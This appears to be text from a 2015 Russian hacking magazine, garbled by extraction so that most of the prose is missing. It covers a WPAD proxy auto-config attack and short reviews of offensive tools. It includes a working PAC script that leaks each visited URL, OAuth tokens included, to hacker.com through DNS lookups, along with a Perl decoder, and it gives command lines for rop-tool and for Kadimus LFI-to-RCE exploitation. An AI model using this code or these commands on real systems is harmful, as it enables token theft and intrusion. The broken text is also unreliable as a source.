BAcktoPAc PAC-JavaScript, window,document,

4

5

3

. 3. NBNS-

. 4.

-

WPAD

. 5. -

wpad.work:

. 6. HTTP- -

-

6

06 /197/ 201580

, -: Chrome , , (GET-), Firefox (location.hash). , URLhttp://mail.ru/?a=123#token=secret(..910).

,-,- URL. , isResolvable, URL. URL , -,d.wpad.work,NS-DNS-,-.

,-:

function encode(str) { r = str.toLowerCase() .replace(/([^a-z1-9])/gfunction(m) { return "0" + m.charCodeAt(0)

}) .replace(/([^\.]{60})(.)/g, '$1.$2') .substr(0, 240); return r + (r.slice(-1) != "." ? "." : "") + "hacker.com";}function FindProxyForURL(url, host) { var u = encode(url); return isResolvable(u) ? "DIRECT" : "DIRECT";}

URLhttps://example.ru/?token=123- https058047047example046ru047063token061123.hacker.com,,-Perl:

echo 'https058047047example046ru047063token061123.hacker.com' \| perl -lape 's/\.hacker\.com$//; s/\.//g; s/0(..)/chr($1)/eg;'

,URL(location.hash)-OAuth-. , -Firefox.

WPAD , HTTPS, -,OAuthURL.,-wpad.LTD.

, , , WPAD.,-: .

.local,,-broadcast-,,Bonjour.-,.

wpad. -

(IEChrome).

alert (-)..

isResolvable,-IP-.:

if (isResolvable(host)) return "PROXY proxy.com:8080";

? , , FindProxyForURLURL.-

. 7. HTTPS-

-

. 8. JavaScript-

,

PAC-

. 9.

FindProxyForURL

Chrome

. 10.

FindProxyForURL

Firefox

8

7

9

10

06 /197/ 2015 WPAD 81

Dylib Hijack Scanner DLL hijack Windows, , . : , - DLL- DLL (Microsoft Security Advisory 2269637). , Mac, dylib-. - : LC_LOAD_WEAK_DYLIB; @RPATHS; LC_LOAD_DYLIB + LC_RPATH.

, , - - , - , , .

Dylib hijack scanner (DHS) , - , dylib hijacking .

- Mac, iCloud Photos, Xcode, Word, Excel, Dropbox .

- DLL Hijacking on OS X? #@%& Yeah! (ht tps://s3.amazonaws.com/s3.synack.com/canSecW.pdf) CanSecWest 2015.

rop-toolRop-tool , . - , - .

: gadget ROP-; patch -

; info

; search

.

: , , ; ; Intel AT&T ; ELF, PE MACH-O; big little endian; x86 x86_64.

- Capstone.

:

# rop-tool g ./program# rop-tool s ./program -s "/bin/sh"# rop-tool s ./program -a# 01000 \xaa\xbb\xcc\xdd patchedrop-tool p ./program -o 0x1000 -b "\xaa\xbb\xcc\xdd" -O patched

lFi Kadimus LFI (Local File Inclusion) - .

: URL-; /var/log/auth.log RCE; /proc/self/environ RCE; php://input RCE; data://text RCE; ; ; shell- HTTP-

; (socks4://, socks4a://,

socks5://, socks5h:// http://); socks5 bind connections.

:

./kadimus -U url_list.txt --threads 10 --connect-timeout 10 --retry-times 0

:

./kadimus -t localhost/?pg=contact -G -f "index.php%00" -O local_output.php --inject-at pg

PHP-:

./kadimus -t localhost/?pg=php://input%00 -C '' -X input

RFI (Remote File Inclusion) .

X-toolS

D1g1 Digital Security

@evdokimovds

: Patrick Wardle: MacURL: https://objective-see.com/products/dhs.html

: t00sh: LinuxURL: https://github.com/t00sh/rop-tool

: P0cL4bs Team: LinuxURL: https://github.com/P0cL4bs/Kadimus

WARNING

! - ! , - !

1 2 3

06 /197/ 201582

victimS verSion SearcH Java- , - - . , .

Victims-version-search Python-, - JAR-. - victims-cve-db (https://github.com/victims/victims-cve-db). - , - .

- :1. Maven manifest (pom.xml), -

.2.

artifactId.3. META-INF/MANIFEST.MF

artifactId.

: Python 2.6+; PyYAML; SQLite 3; victims-cve-db .

- .

Technology

Haker062015-myjurnal.ru